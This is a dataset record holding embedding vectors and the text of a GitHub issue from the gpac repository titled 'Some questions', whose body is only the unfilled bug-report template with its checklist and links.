-0.0007931400323286653, 0.01758366823196411, -0.021207328885793686, -0.019989540800452232, -0.003458443097770214, -0.014086240902543068, 0.014628305099904537, 0.0043996297754347324, -0.0049528321251273155, 0.0150441350415349, -0.009385877288877964, -0.009861110709607601, -0.004570417106151581, 0.0164401363581419, 0.04036521166563034, 0.0038538528606295586, -0.018474731594324112, 0.02627154439687729, -0.023880522698163986, 0.030058568343520164, 0.0024485704489052296, 0.01094523910433054, -0.01482879463583231, 0.006928024813532829, -0.010566537268459797, -0.0033062195871025324, 0.007421822752803564, -0.011776898987591267, 0.008405705913901329, 0.012207580730319023, 0.0012641974026337266, 0.004585267975926399, 0.021103372797369957, 0.00511248130351305, 0.000937937933485955, 0.0021812510676681995, 0.005936715751886368, 0.01353675127029419, 0.016024306416511536, 0.012348665855824947, -0.004106320906430483, 0.004343938082456589, -0.012408070266246796, -0.006816641427576542, -0.0036143793258816004, -0.006077800877392292, 0.00016510214481968433, 0.018430178984999657, 0.007277024909853935, -0.029093248769640923, -0.00871015340089798, 0.01197738852351904, 0.01715298742055893, 0.00943042989820242, 0.0005634124972857535, 0.02062813751399517, -0.004303097724914551, 0.009883387945592403, 0.0007731838850304484, -0.013856049627065659, 0.020048946142196655, 0.00763345044106245, 0.0023279052693396807, -0.002500549191609025, 0.008457684889435768, -0.011420473456382751, 0.0036737837363034487, -0.015653029084205627, -0.0035197038669139147, -0.014658006839454174, -0.004726353567093611, -0.020256860181689262, 0.018875710666179657, -0.00889579113572836, -0.011762048117816448, -0.01379664521664381, -0.0072621735744178295, 0.009720025584101677, 0.022395415231585503, -0.02126673422753811, 0.00006120265607023612, -0.023108266294002533, -0.017806435003876686, 0.033622823655605316, 0.0213409885764122, -0.01380407065153122, -0.006549322512000799, 0.005513459909707308, -0.005632268730551004, -0.005840183701366186, -0.014383262023329735, -0.010418026708066463, 0.0034008952789008617, 0.012266984209418297, -0.016454987227916718, -0.009304195642471313, 0.00031442500767298043, -0.02805367298424244, 0.012296686880290508, 0.0027975705452263355, -0.052929218858480453, -0.009504685178399086, 0.018237115815281868, -0.002008607378229499, 0.0007379126036539674, -0.0000302242497127736, -0.017167838290333748, 0.014591176994144917, 0.02197958528995514, -0.003920682705938816, -0.008272046223282814, -0.00892549380660057, -0.004169438034296036, 0.016365880146622658, -0.0006687623099423945, -0.011806601658463478, -0.00537980068475008, 0.018073752522468567, -0.004065480548888445, -0.00001644640178710688, 0.007555482443422079, 0.02287064865231514, -0.019068775698542595, 0.03240503743290901, 0.01093781366944313, 0.015415411442518234, -0.0020178891718387604, -0.00866559986025095, -0.026954693719744682, 0.013870900496840477, -0.00033646958763711154, -0.015682730823755264, 0.02367260679602623, -0.012296686880290508, 0.002262932015582919, -0.00393182085826993, -0.008324025198817253, 0.0009931654203683138, 0.01633617840707302, 0.009779429994523525, -0.014769390225410461, -0.0009681041701696813, 0.01228183601051569, 0.02162315882742405, 0.015504518523812294, -0.0006562317139469087, -0.00013644421414937824, 0.014138219878077507, 0.022840946912765503, 0.0220686923712492, 0.001343093696050346, -0.013462495990097523, -0.002793857827782631, 0.00016162142856046557, -0.015950050204992294, 0.011271962895989418, -0.00495654484257102, -0.0027121768798679113, 0.008101259358227253, -0.006207747850567102, 0.010336345061659813, 0.001945490250363946, -0.0006993926363065839, 0.002498692600056529, -0.001589064602740109, 0.0021459797862917185, 0.013789219781756401, 0.00965319573879242, 0.007206482347100973, 0.002511687343940139, -0.007507216185331345, -0.011012068949639797, -0.0007778248400427401, -0.011175431311130524, 0.0006432370282709599, -0.010744749568402767, -0.011932835914194584, 0.006055524107068777, 0.0015937056159600616, 0.023360734805464745, 0.02356864884495735, -0.0157124325633049, 0.014940177090466022, 0.0023761712945997715, 0.01740545593202114, 0.0016679608961567283, 0.009593792259693146, 0.01966281794011593, 0.014925326220691204, -0.018148008733987808, 0.004655810538679361, -0.006430513691157103, 0.00817551463842392, -0.011658091098070145, 0.016024306416511536, 0.012964985333383083, 0.012757070362567902, -0.0036422251723706722, 0.000497510889545083, -0.005966417957097292, -0.015935199335217476, 0.008494812995195389, 0.011316516436636448, -0.01179175078868866, -0.0020141764543950558, 0.003716480452567339, -0.007340142037719488, -0.011591261252760887, -0.03742469847202301, 0.0034770069178193808, -0.001532444846816361, 0.005424353759735823, 0.008687876164913177, -0.024845842272043228, -0.022439967840909958, 0.013477346859872341, -0.0037573210429400206, 0.0030277620535343885, -0.005617417395114899, -0.004477597773075104, 0.0022462245542556047, 0.004867438692599535, 0.0028384109027683735, 0.010284367017447948, -0.013291708193719387, -0.005439204629510641, 0.01277934666723013, 0.015430263243615627, -0.024162692949175835, -0.015385709702968597, -0.003298794152215123, 0.0179400946944952, -0.008598770014941692, -0.02832099236547947, -0.0011258968152105808, -0.0183856263756752, 0.0023631767835468054, -0.020687542855739594, -0.0049528321251273155, 0.004897140897810459, 0.002084719017148018, 0.014843645505607128, 0.000581048137973994, 0.014613454230129719, -0.011309091001749039, 0.008539365604519844, -0.003031474770978093, -0.024964651092886925, -0.002079149940982461, 0.007024556398391724, 0.005647119600325823, 0.011932835914194584, -0.0028606874402612448, -0.008472535759210587, 0.014576326124370098, 0.003471437841653824, -0.009437855333089828, 0.010150707326829433, -0.005795630626380444, 0.01758366823196411, 0.01027694158256054, 0.005647119600325823, 0.010195259936153889, -0.0016753864474594593, -0.0017737747402861714, -0.017435157671570778, -0.009385877288877964, 0.012690240517258644, 0.014197624288499355, -0.012920431792736053, -0.008569068275392056, -0.004295672290027142, 0.014160496182739735, -0.02098456397652626, 0.0012326388387009501, 0.010306643322110176, -0.0269695445895195, -0.029226908460259438, -0.019766775891184807, -0.003787023015320301, -0.0005713021382689476, -0.00033507728949189186, 0.026286395266652107, -0.00834630150347948, -0.00156864442396909, 0.007132227066904306, -0.008539365604519844, 0.005572864320129156, 0.014487219974398613, 0.005955279339104891, -0.003445448586717248, 0.008517089299857616, -0.009445280767977238, -0.01018040906637907, -0.017004476860165596, -0.005754789803177118, -0.0004965827101841569, 0.01473226211965084, 0.025870565325021744, 0.02500920370221138, 0.0056619709357619286, -0.021385543048381805, -0.003053751541301608, -0.0022146659903228283, -0.001043287687934935, 0.002001181710511446, 0.008383429609239101, 0.015653029084205627, -0.0023409000132232904, -0.007811663206666708, 0.012252133339643478, 0.014353560283780098, 0.00014212938549462706, -0.009616068564355373, -0.0002471311017870903, -0.012942708097398281, 0.016365880146622658, 0.022380564361810684, 0.0029386556707322598, 0.009875962510704994, 0.014613454230129719, -0.02099941484630108, -0.003218969563022256, -0.03028133325278759, -0.006192896515130997, 0.0034138900227844715, -0.011762048117816448, 0.01173977181315422, 0.0032449590507894754, -0.019499456509947777, 0.01975192502140999, -0.01018040906637907, -0.013403091579675674, -0.004640959668904543, -0.006827780045568943, 0.000015837274986552075, -0.014932751655578613, 0.013417942449450493, 0.000539279542863369, 0.006315418053418398, -0.009504685178399086, -0.03216741979122162, 0.011932835914194584, 0.0100021967664361, 0.008465110324323177, 0.01893511600792408, -0.02009349875152111, 0.007819089107215405, 0.004132310394197702, 0.0030964482575654984, 0.002946081105619669, -0.006178045645356178, -0.023702308535575867, 0.006623577792197466, -0.0033359217923134565, 0.022291457280516624, 0.009616068564355373, -0.01049970742315054, 0.011465026997029781, 0.009861110709607601, 0.01303924061357975, 0.0011314660077914596, 0.011910558678209782, -0.030474398285150528, 0.014420390129089355, 0.0015937056159600616, -0.014398112893104553, 0.003998650703579187, -0.009111132472753525, -0.010566537268459797, 0.0024894108064472675, -0.001861953060142696, 0.005829045549035072, 0.012155601754784584, -0.0009351533954031765, -0.027370523661375046, -0.025083458051085472, -0.005431779194623232, 0.005498609039932489, -0.010314068756997585, -0.009103706106543541, -0.011910558678209782, 0.0012001522118225694, -0.013997134752571583, -0.003980087116360664, -0.007358705624938011, 0.008494812995195389, -0.009044302627444267, 0.025944821536540985, -0.0020568734034895897, -0.0008279472240246832, -0.012296686880290508, 0.0008520801784470677, 0.003332209074869752, -0.015519369393587112, -0.013425367884337902, 0.00047569835442118347, -0.010418026708066463, -0.01303181517869234, -0.016395581886172295, 0.003924395423382521, 0.00006468337232945487, -0.009371025487780571, -0.007841365411877632, -0.007878493517637253, -0.005171885713934898, 0.011769473552703857, 0.007618599571287632, 0.014056539162993431, 0.010521983727812767, -0.0010377186117693782, -0.004433044698089361, -0.0028606874402612448, 0.011650665663182735, -0.0034751505590975285, 0.008910642936825752, -0.00558400247246027, -0.01143532432615757, 0.012088771909475327, 0.014383262023329735, 0.00866559986025095, 0.01272736769169569, -0.01045515388250351, 0.0013941442593932152, 0.007106237579137087, -0.01509611401706934, 0.015385709702968597, 0.005320396274328232, 0.013588730245828629, -0.01040317490696907, 0.00013481988571584225, 0.0004088685382157564, -0.005465194117277861, 0.0017979077529162169, 0.020940009504556656, 0.0006594803999178112, 0.0032857994083315134, -0.011672941967844963, 0.012482325546443462, 0.006152056157588959, 0.0061631943099200726, -0.013276857323944569, 0.002001181710511446, 0.0010043036891147494, -0.01067791972309351, -0.011338792741298676, -0.005428066477179527, 0.002611932111904025, -0.020123200491070747, -0.00651590758934617, -0.024712182581424713, 0.027192311361432076, 0.021029116585850716, 0.007774535566568375, -0.025959672406315804, -0.0015760698588564992, -0.010113579221069813, 0.015623326413333416, 0.005654545500874519, -0.017346050590276718, -0.005840183701366186, -0.031662482768297195, -0.010752175003290176, -0.00247827242128551, 0.0005917223752476275, -0.01075960136950016, -0.018742050975561142, -0.0005787276895716786, -0.020138053223490715, -0.007076535373926163, -0.0059181516990065575, 0.01911332830786705, 0.015667879953980446, -0.004117459524422884, 0.006140918005257845, 0.007729982491582632, -0.04277108609676361, 0.006259726360440254, -0.010997218079864979, 0.02385082095861435, 0.000532318081241101, -0.01228183601051569, -0.011175431311130524, 0.013729815371334553, -0.00972745195031166, -0.018207412213087082, 0.004555566236376762, -0.02456367202103138, 0.003987512551248074, 0.008561642840504646, 0.004191714804619551, -0.006664418149739504, 0.01948460564017296, 0.0033006505109369755, 0.009237365797162056, 0.022395415231585503, 0.004633534234017134, 0.02812792919576168, 0.0021366977598518133, 0.0005898659583181143, -0.012021942064166069, -0.010856132954359055, 0.010321494191884995, -0.016276773065328598, 0.018177710473537445, 0.0034825762268155813, -0.0022555063478648663, -0.018727200105786324, 0.0017208678182214499, 0.001120327622629702, 0.024860693141818047, 0.006924312096089125, -0.0005077209789305925, -0.02135583944618702, 0.0002575732651166618, 0.010462579317390919, 0.010165558196604252, -0.029761547222733498, -0.026405204087495804, -0.000025829840524238534, -0.010314068756997585, 0.001602059230208397, -0.0057436516508460045, -0.003443591995164752, -0.02117762714624405, -0.009326472878456116, -0.01505156047642231, 0.00991308968514204, 0.0031558526679873466, -0.011940261349081993, 0.017910391092300415, 0.03590989112854004, 0.03769201785326004, -0.009133408777415752, 0.0057213748805224895, 0.011145728640258312, 0.0240141823887825, -0.021385543048381805, 0.0030834535136818886, -0.028187332674860954, -0.011056622490286827, 0.014227326028048992, -0.0044701723381876945, 0.00816808920353651, 0.001562147052027285, 0.006192896515130997, 0.015400560572743416, -0.006419375538825989, 0.008843813091516495, 0.010031898505985737, 0.0157124325633049, 0.010841282084584236, 0.004488736391067505, -0.007533205673098564, 0.018281668424606323, -0.01929154060781002, -0.015504518523812294, 0.008286898024380207, 0.016291625797748566, -0.003451017662882805, 0.023286478593945503, 0.00992051512002945, -0.010470004752278328, 0.0020178891718387604, 0.01964796707034111, -0.020494477823376656, -0.0025451022665947676, 0.026865586638450623, 0.001196439377963543, -0.005736226215958595, 0.01857868954539299, 0.0026973257772624493, 0.006148343440145254, 0.004648385103791952, 0.007715131621807814, 0.010083877481520176, 0.007161928806453943, 0.0168856680393219, -0.030593207105994225, -0.006983716040849686, -0.018771754577755928, 0.02582601271569729, 0.013618431985378265, 0.0028811078518629074, -0.004366214852780104, -0.002164543606340885, 0.014851070940494537, 0.04986989498138428, -0.01098236721009016, -0.0020568734034895897, -0.008732429705560207, 0.004429331980645657, 0.0019380648154765368, -0.02419239468872547, 0.02732597105205059, 0.01018040906637907, 0.013952581211924553, 0.003128006821498275, -0.004154587164521217, 0.009125983342528343, 0.0015593625139445066, -0.004637246951460838, 0.00028054602444171906, 0.008539365604519844, 0.002632352290675044, -0.01000962220132351, 0.0046038320288062096, 0.010284367017447948, -0.020865755155682564, 0.011665516532957554, 0.016855966299772263, 0.00812353566288948, -0.007700280286371708, -0.00795274879783392, -0.008116110228002071, -0.015860943123698235, 0.009668047539889812, -0.007217620499432087, 0.002413298934698105, -0.007989875972270966, -0.0068946098908782005, 0.0013839341700077057, -0.010700196959078312, -0.01955885998904705, 0.02037566900253296, -0.005884736776351929, 0.012474900111556053, -0.02144494652748108, -0.0034287411253899336, -0.0010590669699013233, 0.00871015340089798, 0.002819847082719207, 0.0016503252554684877, -0.02526167221367359, -0.005754789803177118, -0.0005351026775315404, 0.003920682705938816, -0.010254664346575737, 0.01624707132577896, -0.007878493517637253, 0.0048191724345088005, -0.003681209171190858, 0.0026731928810477257, -0.0157124325633049, -0.008138386532664299, 0.02732597105205059, -0.004874864127486944, 0.018445029854774475, 0.022989457473158836, -0.0040097893215715885, 0.014598602429032326, 0.012266984209418297, 0.010017047636210918, -0.019588563591241837, -0.016054008156061172, 0.00021383221610449255, -0.006211460568010807, 0.011754622682929039, -0.02180137299001217, -0.0019083626102656126, -0.008272046223282814, -0.0021682563237845898, -0.002084719017148018, 0.008732429705560207, 0.0065864501520991325, 0.0012066494673490524, 0.008873514831066132, 0.0022369425278156996, -0.002526538446545601, 0.011814027093350887, 0.01223728246986866, 0.012415495701134205, -0.004407055210322142, -0.017197540029883385, -0.002463421318680048, -0.009868537075817585, 0.012021942064166069, -0.007095098961144686, -0.03029618412256241, -0.03136546164751053, -0.012868452817201614, 0.01679656095802784, 0.012905580922961235, -0.005082779098302126, -0.008554216474294662, 0.005658258218318224, -0.013781794346868992, 0.015920348465442657, 0.004262257367372513, 0.007848790846765041, 0.005041938740760088, -0.012861027382314205, 0.019811328500509262, -0.0068426309153437614, -0.006408236920833588, 0.017360901460051537, -0.009296770207583904, -0.015682730823755264, -0.026835884898900986, -0.01731634885072708, 0.015326305292546749, 0.005888449493795633, -0.019855881109833717, 0.001969623379409313, -0.04467201977968216, -0.0015909209614619613, 0.0168856680393219, 0.013826346956193447, 0.0035735389683395624, 0.018979668617248535, -0.014056539162993431, 0.001470256014727056, -0.011576409451663494, 0.013210027478635311, 0.0028235598001629114, 0.0043773530051112175, -0.023642905056476593, 0.0005996120162308216, 0.020494477823376656, -0.009341323748230934, -0.011814027093350887, 0.05067185312509537, 0.013417942449450493, 0.0148213692009449, 0.0016688890755176544, -0.008524514734745026, 0.021058818325400352, 0.002996203489601612, -0.027266565710306168, -0.0048414492048323154, 0.008940344676375389, -0.001990043558180332, -0.00417315075173974, 0.01040317490696907, -0.002240655245259404, 0.0037721721455454826, 0.014309006743133068, -0.0002086111344397068, 0.009452707134187222, -0.003282086690887809, -0.016662901267409325, -0.02053903043270111, 0.006204035133123398, 0.03222682327032089, -0.018430178984999657, 0.006716396659612656, -0.0001228694018209353, 0.004544427618384361, -0.001610412960872054, 0.011568984016776085, 0.007596322800964117, 0.023895373567938805, -0.006441651843488216, -0.01450949627906084, 0.020568734034895897, 0.013908027671277523, 0.007707705721259117, 0.017553966492414474, 0.019677668809890747, -0.0005903300479985774, 0.005565438885241747, 0.004830311052501202, 0.006857482250779867, -0.0038427147082984447, 0.0020550170447677374, 0.00660872645676136, 0.003257953794673085, -0.0022796394769102335, 0.002192389452829957, 0.036296017467975616, 0.01098236721009016, 0.019603414461016655, 0.005439204629510641, -0.014903049916028976, 0.008383429609239101, 0.0017802721122279763, -0.0008460469543933868, -0.012356091290712357, -0.007161928806453943, 0.004381065722554922, -0.019781626760959625, 0.00600725831463933, -0.013024389743804932, -0.010841282084584236, -0.0012242852244526148, -0.022618182003498077, 0.00268990034237504, 0.009705174714326859, 0.00964577030390501, -0.019172731786966324, 0.015474815852940083, 0.006909460760653019, 0.005643406882882118, 0.0017375752795487642, 0.004941693972796202, -0.02125188335776329, -0.028989290818572044, 0.016558943316340446, -0.0008246985380537808, -0.002443001139909029, 0.005665683653205633, -0.024043884128332138, -0.006575311534106731, 0.015786688774824142, -0.006697833072394133, 0.002316767117008567, -0.012059069238603115, -0.0017301497282460332, -0.008747280575335026, -0.007421822752803564, 0.02474188432097435, 0.013930304907262325, 0.005038226023316383, -0.0200043935328722, 0.007429248187690973, 0.00589587539434433, -0.02465277723968029, -0.013685261830687523, -0.004295672290027142, 0.001288330415263772, 0.005034513305872679, -0.0009690324077382684, 0.02634580060839653, -0.019499456509947777, -0.002331618219614029, 0.015370858833193779, -0.012705091387033463, -0.001455404912121594, -0.002960932208225131, -0.011769473552703857, 0.013521900400519371, -0.00243557570502162, -0.01398228295147419, -0.014108517207205296, 0.0015519369626417756, 0.009333898313343525, 0.008071556687355042, -0.000441123207565397, -0.002352038398385048, -0.0032709483057260513, 0.0022647883743047714, -0.009385877288877964, -0.013499623164534569, 0.03546435758471489, 0.026108182966709137, 0.003965235780924559, -0.015326305292546749, -0.003913257271051407, 0.02036081813275814, 0.0010061600478366017, 0.01197738852351904, -0.014917900785803795, -0.0260784812271595, 0.01330655999481678, 0.015445114113390446, 0.00888094026595354, 0.01589064672589302, -0.009326472878456116, 0.001512024668045342, 0.02609333209693432, -0.00023900943051557988, -0.008049280382692814, 0.05165202543139458, 0.0014414821052923799, -0.001973336096853018, -0.003549406072124839, 0.011732346378266811, -0.008695302531123161, 0.005680534522980452, -0.00575850298628211, -0.018177710473537445, 0.015341156162321568, 0.023776564747095108, 0.009608643129467964, 0.0028959589544683695, 0.007054258603602648, 0.016662901267409325, 0.034692101180553436, 0.010692771524190903, -0.013677836395800114, 0.007306727115064859, 0.00031396091799251735, 0.006671843584626913, 0.0010033755097538233, 0.0076111736707389355, -0.004919417202472687, 0.012036792933940887, 0.00725474813953042, 0.0038055868353694677, 0.020657839253544807, 0.0019566286355257034, -0.03249414265155792, -0.01027694158256054, 0.01811830699443817, -0.016737157478928566, 0.0075703333131968975, 0.007477514445781708, 0.008628472685813904, -0.0004543499671854079, 0.015200071036815643, -0.004514725413173437, 0.02073209546506405, -0.007132227066904306, -0.005762215703725815, 0.01652924157679081, 0.04003848880529404, -0.012341240420937538, -0.017836136743426323, -0.017375752329826355, 0.014873347245156765, 0.009274493902921677, -0.012118473649024963, -0.035672273486852646, 0.01179175078868866, -0.003423171816393733, -0.017034178599715233, 0.017450008541345596, 0.01857868954539299, 0.013351112604141235, 0.01678171008825302, -0.01473226211965084, 0.01397485751658678, -0.018266817554831505, 0.0002814742038026452, 0.018816307187080383 ]
154
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [ ] I looked for a similar issue and couldn't find any. - [ ] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ ] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/
Some questions
https://api.github.com/repos/gpac/gpac/issues/1670/comments
0
2021-01-02T12:11:35
2021-01-02T12:11:52Z
https://github.com/gpac/gpac/issues/1670
777,450,852
1,670
false
This is a GitHub Issue repo:gpac owner:gpac Title : Some questions Issue date: --- start body --- Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [ ] I looked for a similar issue and couldn't find any. - [ ] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ ] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ --- end body ---
813
[ -0.021798890084028244, 0.04142637178301811, -0.01782928593456745, -0.0036239593755453825, 0.010746767744421959, 0.02961934730410576, -0.019593553617596626, 0.05313161388039589, -0.03051844611763954, 0.057508353143930435, -0.020967647433280945, -0.03891568258404732, 0.03674427419900894, 0.014623068273067474, -0.019644446671009064, 0.008647458627820015, 0.0004808266821783036, 0.012672195211052895, 0.02140871435403824, -0.0065820771269500256, 0.02600599080324173, -0.023546192795038223, -0.002733343280851841, 0.026192596182227135, -0.012061486952006817, 0.0013645511353388429, -0.021764962002635002, -0.0031701691914349794, -0.023529229685664177, -0.012570410035550594, 0.028397930786013603, 0.017260989174246788, -0.025768492370843887, 0.007922242395579815, 0.029093459248542786, -0.04363170638680458, 0.05170662701129913, 0.036235351115465164, 0.000593744043726474, 0.029008638113737106, -0.04532811790704727, -0.03421662375330925, -0.02318994700908661, 0.007582960184663534, -0.03173986077308655, 0.005106199067085981, 0.018507851287722588, 0.03450501337647438, -0.006997697986662388, -0.020645329728722572, 0.02052658051252365, -0.020509617403149605, -0.014716370962560177, -0.03592999652028084, -0.0056575327180325985, -0.04213886335492134, 0.016277069225907326, -0.036812134087085724, 0.014249857515096664, 0.0006197203765623271, -0.00436401879414916, 0.024581003934144974, -0.028805069625377655, 0.022579239681363106, 0.006493015680462122, 0.020255153998732567, -0.02405511774122715, 0.046515606343746185, -0.01238380465656519, 0.035488929599523544, 0.018032856285572052, -0.01957659050822258, -0.025683671236038208, 0.010924890637397766, 0.00571266608312726, -0.05146912857890129, 0.03436930105090141, 0.0077950116246938705, 0.008392996154725552, 0.036981772631406784, -0.05140127241611481, 0.01899980939924717, -0.04251207411289215, 0.010534715838730335, 0.00007567585998913273, -0.0037257440853863955, -0.04329242557287216, -0.0912669450044632, -0.01659090630710125, 0.027549725025892258, 0.007532067596912384, 0.015691807493567467, 0.012561928480863571, -0.03330055996775627, 0.03292734920978546, -0.008626253344118595, -0.013961467891931534, -0.010203915648162365, -0.03470858186483383, -0.04495490714907646, 0.003284676931798458, -0.014623068273067474, -0.017065901309251785, -0.0414603017270565, 0.014673960395157337, 0.017388219013810158, 0.03289342299103737, -0.022460490465164185, -0.007243677508085966, 0.08800983428955078, 0.00035651150392368436, -0.009991864673793316, -0.009109730832278728, -0.01986498013138771, -0.0034521976485848427, 0.023987259715795517, -0.020509617403149605, -0.05330125242471695, -0.01217175368219614, -0.015734218060970306, -0.0025933892466127872, -0.015386453829705715, -0.014300749637186527, -0.0006674319738522172, -0.029432741925120354, 0.058051206171512604, -0.014020842500030994, -0.0036981774028390646, 0.0002881249238271266, 0.00605618953704834, -0.038678184151649475, -0.0027142586186528206, -0.004368260037153959, -0.045395974069833755, 0.029093459248542786, -0.006327615585178137, 0.019763195887207985, 0.0630725845694542, -0.012180235236883163, 0.008409961126744747, -0.06232616305351257, -0.06300472468137741, 0.03877997025847435, -0.0121293431147933, -0.025938134640455246, -0.02173103392124176, -0.023257803171873093, 0.011060603894293308, -0.03352109342813492, -0.007901037111878395, -0.03056933730840683, -0.027193479239940643, 0.004826290998607874, 0.01453824806958437, 0.043360281735658646, -0.018134640529751778, 0.008545673452317715, 0.029042568057775497, 0.02098461240530014, 0.005275840405374765, -0.00908428430557251, -0.027278298512101173, 0.011951220221817493, -0.024462256580591202, -0.0022710710763931274, -0.04400491714477539, 0.02351226471364498, 0.019169451668858528, -0.03640499338507652, 0.013316831551492214, -0.008897678926587105, 0.00045644075726158917, 0.0004439827462192625, 0.017277952283620834, -0.03749069571495056, -0.03742283955216408, 0.007048590108752251, 0.05703336000442505, -0.02671848237514496, -0.012850318104028702, -0.010924890637397766, -0.005602399352937937, 0.027074730023741722, -0.005526060704141855, 0.015937786549329758, -0.029517563059926033, 0.055167306214571, -0.034776438027620316, 0.02471671812236309, -0.01047534216195345, 0.022986378520727158, 0.014936904422938824, 0.014656996354460716, -0.0019339092541486025, 0.03306306153535843, -0.011722204275429249, -0.05492980778217316, 0.012689159251749516, -0.022341741248965263, -0.02264709584414959, -0.011255690827965736, -0.03140057995915413, 0.00910124834626913, 0.0005367552512325346, -0.029008638113737106, 0.00605618953704834, 0.0003421980363782495, 0.04512454941868782, 0.00021920818835496902, -0.059544049203395844, -0.028855962678790092, -0.029229171574115753, 0.005017137620598078, -0.010958818718791008, -0.031332723796367645, -0.013664595782756805, -0.00405442388728261, -0.012841835618019104, -0.008931607007980347, -0.009211515076458454, 0.037219271063804626, -0.005848378874361515, 0.02746490389108658, 0.002614594530314207, -0.04865308478474617, -0.010933373123407364, 0.032282713800668716, -0.007286088075488806, -0.00287753832526505, 0.021001575514674187, 0.04213886335492134, 0.023172982037067413, -0.029415776953101158, 0.007137652020901442, -0.014046288095414639, 0.011917292140424252, 0.008002822287380695, -0.015284668654203415, -0.009593207389116287, 0.020543545484542847, -0.01476726308465004, 0.05214769393205643, -0.028889890760183334, -0.0047033014707267284, 0.003316484624519944, 0.038101404905319214, -0.005856861360371113, 0.03654070571064949, 0.0006531184772029519, -0.006993456743657589, 0.013944503851234913, -0.008053714409470558, 0.0021968530490994453, -0.008270006626844406, -0.008185186423361301, 0.014877529814839363, 0.02285066433250904, 0.029805952683091164, -0.010229362174868584, -0.035862140357494354, -0.008719556033611298, -0.01883016899228096, -0.03545500338077545, -0.029839880764484406, -0.006132528185844421, -0.022324776276946068, 0.01621769554913044, -0.01310477964580059, -0.011001229286193848, -0.03613356873393059, 0.02500510774552822, -0.017948035150766373, -0.03647284954786301, 0.057677995413541794, -0.024954214692115784, -0.0026548842433840036, 0.010297218337655067, -0.010797659866511822, 0.019135523587465286, 0.002273191697895527, -0.009949454106390476, -0.002140659373253584, -0.0004760555166285485, -0.006149492226541042, -0.01684536784887314, 0.007973134517669678, 0.012019076384603977, -0.014241375960409641, -0.030230054631829262, 0.007269124034792185, 0.02106943167746067, 0.019627481698989868, -0.03039969690144062, 0.011561045423150063, 0.006569353863596916, 0.018406067043542862, -0.015462792478501797, -0.011857917532324791, 0.015980197116732597, 0.01771053671836853, -0.04027281329035759, 0.030263982713222504, 0.014546729624271393, -0.02015336975455284, -0.025361353531479836, 0.027142586186528206, -0.01994980126619339, 0.052656617015600204, 0.009160622954368591, -0.011213281191885471, 0.02459796890616417, -0.06493863463401794, -0.035896070301532745, -0.020882826298475266, 0.0201194416731596, 0.01945784129202366, 0.009016428142786026, -0.05364053696393967, -0.035251434892416, -0.011128460057079792, 0.03073897957801819, 0.009542315267026424, -0.04302099719643593, -0.00908428430557251, 0.017150722444057465, -0.014656996354460716, 0.0005842017708346248, -0.02566670812666416, -0.026226524263620377, 0.009924008511006832, 0.012349876575171947, 0.0064972564578056335, 0.007761083077639341, -0.020102478563785553, 0.03014523535966873, -0.05872977152466774, -0.02359708584845066, 0.0071546160615980625, 0.028007756918668747, -0.03260503336787224, -0.0018119796877726912, -0.00972892064601183, 0.005984092131257057, 0.021459607407450676, -0.010271772742271423, -0.042953141033649445, -0.008329381234943867, 0.016268586739897728, 0.03535321727395058, 0.01580207422375679, 0.0011270535178482533, 0.021578356623649597, 0.011289619840681553, 0.01737125590443611, 0.023580120876431465, 0.011128460057079792, -0.011807025410234928, -0.038304973393678665, 0.02612474001944065, 0.019814087077975273, 0.02451314777135849, -0.06314044445753098, 0.009533833712339401, 0.038678184151649475, 0.008011303842067719, -0.009398120455443859, -0.027346154674887657, -0.0168029572814703, 0.015284668654203415, -0.0008975077653303742, -0.017608752474188805, -0.008053714409470558, -0.06663504987955093, 0.0061155641451478004, -0.016277069225907326, 0.03491215035319328, 0.014648514799773693, 0.011934256181120872, -0.05187626928091049, 0.0037851184606552124, -0.03820319101214409, 0.016692690551280975, 0.03894961252808571, -0.022239957004785538, -0.007820457220077515, 0.011111496016383171, 0.0015066255582496524, 0.04281742870807648, -0.02948363497853279, -0.031705934554338455, -0.028516680002212524, 0.02953452616930008, -0.013537365011870861, -0.03267288953065872, -0.07396354526281357, 0.005063788499683142, -0.04790666326880455, -0.02252834662795067, 0.008990981616079807, 0.002472519874572754, 0.050824493169784546, -0.029042568057775497, -0.0005688280216418207, 0.04135851562023163, 0.0009563520434312522, 0.010186951607465744, -0.013367723673582077, 0.002502207178622484, 0.043156713247299194, -0.00166990514844656, -0.0008254103013314307, -0.015267704613506794, -0.026073846966028214, -0.007570236921310425, 0.015997162088751793, 0.01837213709950447, -0.014003878459334373, 0.03911925107240677, -0.030009521171450615, 0.007862867787480354, -0.006777164526283741, 0.0061452509835362434, -0.002268950454890728, -0.01047534216195345, 0.021205145865678787, 0.034488048404455185, 0.013647631742060184, 0.01676054671406746, 0.039390679448843, -0.03603178262710571, 0.0381692610681057, -0.025310462340712547, 0.011883363127708435, -0.02368190698325634, 0.03956031799316406, -0.0051019578240811825, -0.04868701472878456, -0.02252834662795067, 0.00638698972761631, 0.001171584241092205, -0.05686371773481369, 0.014623068273067474, 0.02318994700908661, 0.014902976341545582, 0.03542107343673706, -0.03280860185623169, -0.05374231934547424, -0.02878810465335846, 0.019135523587465286, -0.018558742478489876, 0.028516680002212524, 0.032621994614601135, -0.00640819501131773, 0.001609470578841865, -0.0014886012068018317, 0.007226713467389345, 0.004720265511423349, -0.012935138307511806, 0.03131575882434845, -0.013367723673582077, -0.0242586862295866, 0.026854196563363075, -0.00741331884637475, 0.008435406722128391, 0.030620230361819267, 0.010382039472460747, -0.019712302833795547, -0.03094254806637764, 0.017931070178747177, -0.009779812768101692, 0.01033114641904831, -0.005114681087434292, 0.025785457342863083, 0.00804523192346096, -0.0069680106826126575, -0.0011461380636319518, 0.010229362174868584, -0.040374595671892166, 0.036269281059503555, 